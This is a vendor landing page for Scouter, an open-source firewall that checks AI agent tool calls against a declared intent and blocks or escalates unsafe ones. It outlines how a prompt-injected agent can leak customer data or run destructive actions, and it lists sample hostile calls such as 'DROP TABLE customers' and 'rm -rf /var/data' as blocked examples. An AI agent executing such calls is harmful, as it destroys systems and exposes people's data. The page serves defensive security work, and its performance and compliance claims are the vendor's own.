The open-source firewall that checks every agent tool call before execution — blocking data leaks, destructive actions, and unauthorized API calls in real time.
OpenAI · LangChain · CrewAI · custom Python · MCP.
The problem
Your agents now query databases, modify customer records, send emails, call internal APIs, trigger refunds, run shell commands, and reach into production systems.
The risk isn't bad text output. It's unsafe action execution.
Data leakage: A prompt-injected agent calls send_email() or an external webhook with customer records or internal data attached.
Destructive actions: The agent fires delete_order(), drop_table(), remove_user(), or cancel_subscription() with no approval gate in front of it.
Unauthorized API calls: The agent uses privileged keys to call refund_payment(), modify configs, or hit internal APIs outside its intended role.
Prompt injection → agent reasoning → tool call → production action → business damage.
Once the tool call fires, the damage is real. Scouter checks every action before execution.
How Scouter works
Scouter intercepts every tool call. Evaluates the action, arguments, context, user intent, tool risk, and policy. Then allows, blocks, or escalates — before anything hits production.
Every tool_call is captured before execution.
OpenAI · LangChain · CrewAI · MCP · custom agents.
Policy engine checks the action, args, tool risk, and approval rules.
Allow · Block · Require human approval.
Unsafe actions are blocked before they execute. Every decision is logged.
Signed audit trail · SIEM / SOC ready.
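The allow / block / escalate decision can be sketched as a minimal default-deny check against a registered intent. This is an illustrative sketch, not Scouter's actual engine; the names `Intent`, `Decision`, and `evaluate_tool_call` are assumptions for the example:

```python
from dataclasses import dataclass, field
from enum import Enum

class Decision(Enum):
    ALLOW = "allow"
    BLOCK = "block"
    REQUIRE_APPROVAL = "require_approval"

@dataclass
class Intent:
    permitted_actions: list[str]
    excluded_actions: list[str]
    high_risk_actions: list[str] = field(default_factory=list)

def evaluate_tool_call(intent: Intent, tool_name: str) -> Decision:
    """Decide whether a tool call may execute: allow, block, or escalate."""
    if tool_name in intent.excluded_actions:
        return Decision.BLOCK                 # explicitly forbidden
    if tool_name in intent.high_risk_actions:
        return Decision.REQUIRE_APPROVAL      # escalate to a human
    if tool_name in intent.permitted_actions:
        return Decision.ALLOW                 # within declared scope
    return Decision.BLOCK                     # default-deny everything else

intent = Intent(
    permitted_actions=["lookup_order", "search_knowledge_base"],
    excluded_actions=["delete_order", "modify_payment"],
    high_risk_actions=["refund_payment"],
)
evaluate_tool_call(intent, "lookup_order")   # Decision.ALLOW
evaluate_tool_call(intent, "delete_order")   # Decision.BLOCK
```

Note the last line: anything the intent never mentioned is blocked by default, which is what turns a declared intent into a real boundary rather than a suggestion.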
Integration
Wrap your client. Declare what the agent is and isn't allowed to do. Every tool call is now policy-checked before execution.
```python
from scouter.client import ScouterClient
from scouter.integrations.openai import wrap_openai
from openai import OpenAI

# 1. Init Scouter (cloud backend at scouter.intellectmachines.com)
scouter = ScouterClient(
    api_key="your-api-key",
    mode="enforce",  # audit | enforce
)

# 2. Register agent intent
intent = scouter.register_intent(
    agent_id="support-bot",
    natural_language="Answer customer questions about orders and products",
    permitted_actions=["lookup_order", "search_knowledge_base"],
    excluded_actions=["delete_order", "modify_payment"],
)

# 3. Wrap your OpenAI client — that's it
client = wrap_openai(OpenAI(api_key="..."), scouter=scouter, intent_id=intent.intent_id)

# 4. Use normally — Scouter governs every call transparently
response = client.chat.completions.create(
    model="gpt-4o-mini",
    messages=[{"role": "user", "content": "What's my order status for ORD-123?"}],
)
```
Try it live
Open the live Scouter dashboard, send agent tool calls through the policy engine, and watch unsafe actions get blocked before execution — in real time, on real traffic.
scouter.intellectmachines.com/ui/ · no signup required
Tool calls in the wild
Real agent tool calls. Real policy decisions. Made in milliseconds, before anything reaches production.
delete_order(id="ORD-9921")
Destructive action · approval required
send_email(to="ext@x.com", body=customer_data)
Data leakage · external recipient + PII
run_sql("DROP TABLE customers")
Database write · irreversible operation
execute_shell("rm -rf /var/data")
Shell exec · outside declared scope
refund_payment(amount=999999)
Privileged API · over policy threshold
lookup_order(id="ORD-123")
Within policy · executed & logged
See it live
A support agent with order-tool access is told to delete an order and email customer data externally. Without Scouter, the action executes. With Scouter, it's blocked before execution and logged for review.
Who it's for
For builders: Ship agents faster without building your own runtime guardrail system. Open-source SDK, free for dev + staging.
For enterprises: Deploy AI agents with policy enforcement, approval workflows, and signed audit trails. SOC 2, ISO 42001, EU AI Act ready.
For security teams: See what every agent did, which tool it called, what data it touched, and why the action was allowed — before it becomes an incident.
Without Scouter vs. with Scouter
Monitoring tells you after the damage. IAM checks who, not what. Scouter checks the action itself — and blocks it before execution.
| Capability | Observability | IAM | Prompt Injection Protection | Scouter |
|---|---|---|---|---|
| Blocks unsafe actions | — | — | partial | ✓ real-time |
| Understands agent intent | — | — | — | ✓ registry |
| Prompt injection defense | — | — | ✓ text only | ✓ classifier |
| Shell / SQL / API guards | — | — | — | ✓ 60+ rules |
| Compliance audit trail | partial | auth only | — | ✓ signed |
| Works with agent frameworks | via SDK | — | via SDK | ✓ drop-in |
| Open source | partial | — | partial | ✓ Apache 2.0 |
Build vs. Scouter
A runtime control layer is a 12+ month security engineering project — not a weekend hackathon. Most teams underestimate it until the first agent incident.
• 2–4 senior eng for 6–12 months
• Policy DSL + evaluator
• Fast-path classifier for prompt injection
• Tool-call interceptors per framework (OpenAI, LangChain, CrewAI, MCP)
• Approval workflows + escalation
• Signed audit log + SIEM pipeline
• Ongoing rule maintenance as new attacks emerge
Then maintain it forever, while it's not your core product.
• Wrap your client — minutes, not months
• Policy engine, classifier, and 60+ guards out of the box
• OpenAI, LangChain, CrewAI, MCP, custom Python — already integrated
• Approval gates, audit trail, SIEM hooks built in
• Open source · inspectable · self-hostable
• Threat coverage updated by a team focused only on this
Ship agents to production with boundaries, today.
Most in-house attempts ship a thin allowlist, miss prompt-injection-to-action chains, and end up as a lagging audit log instead of a real enforcement layer.
By the time the gaps surface, an agent has already done something it shouldn't have — and now it's an incident, not a roadmap item.
FAQ
How is Scouter different from content filters and LLM guardrails?
Content filters look at text. Scouter looks at actions. When your agent decides to call delete_order() or send_email(), Scouter evaluates the tool call itself — arguments, context, policy — and blocks it before execution.
Does Scouter stop prompt injection?
Prompt injection is dangerous because agents can execute tools. Even partial defenses leak. Scouter assumes inputs may be hostile and enforces policy at the action layer — the last line before production.
How much latency does Scouter add?
Most calls clear the fast path in under a millisecond. Risky ones get full policy evaluation (~40ms). Users won't notice.
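That two-tier design can be sketched as a cheap set lookup in front of the full evaluation; `FAST_PATH_SAFE` and `full_policy_evaluation` are illustrative names for this sketch, not Scouter internals:

```python
# Tools declared safe and read-only skip deep evaluation entirely.
FAST_PATH_SAFE = {"lookup_order", "search_knowledge_base"}

def full_policy_evaluation(tool_name: str, args: dict) -> str:
    # Stand-in for the full pipeline: classifier, arg guards, approval rules.
    return "needs_review"

def check(tool_name: str, args: dict) -> str:
    # Fast path: a set-membership test, well under a millisecond.
    if tool_name in FAST_PATH_SAFE:
        return "allow"
    # Slow path: everything else gets the full policy evaluation.
    return full_policy_evaluation(tool_name, args)
```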
Can I self-host Scouter?
Yes. The runtime is open source (Apache 2.0). Run it in your own VPC and keep all decisions on your infra. A cloud control plane is also available.
Which frameworks does Scouter support?
OpenAI, LangChain, CrewAI, AutoGen, PhiData, custom Python agents, and MCP-style tool ecosystems.
What's open source and what's enterprise?
The SDK, policy engine, and runtime are open source. The enterprise control plane adds centralized policy management, agent inventory, approval workflows, audit dashboards, SIEM integration, SSO, and compliance reporting.
Can I try it without blocking anything?
Yes. Run mode="audit" to observe and log without blocking. Switch to mode="enforce" once the policy is tuned.
Pricing
The runtime, SDK, and policy engine are free and Apache 2.0. The enterprise control plane is in active development — talk to the founders to shape it.
Free · Apache 2.0
• Full runtime & SDK
• Policy engine + 60+ guards
• Self-host in your VPC
• OpenAI · LangChain · CrewAI · MCP
• Community support
Enterprise · Coming soon
• Centralized policy management
• Agent inventory & approval workflows
• Audit dashboard + SIEM integration
• SSO · RBAC · compliance reporting
• Dedicated support & SLA
IntellectMachines builds runtime security for AI agents. Scouter is the open-source AI Agent Action Firewall. Start with the SDK, scale to the enterprise control plane when you're ready.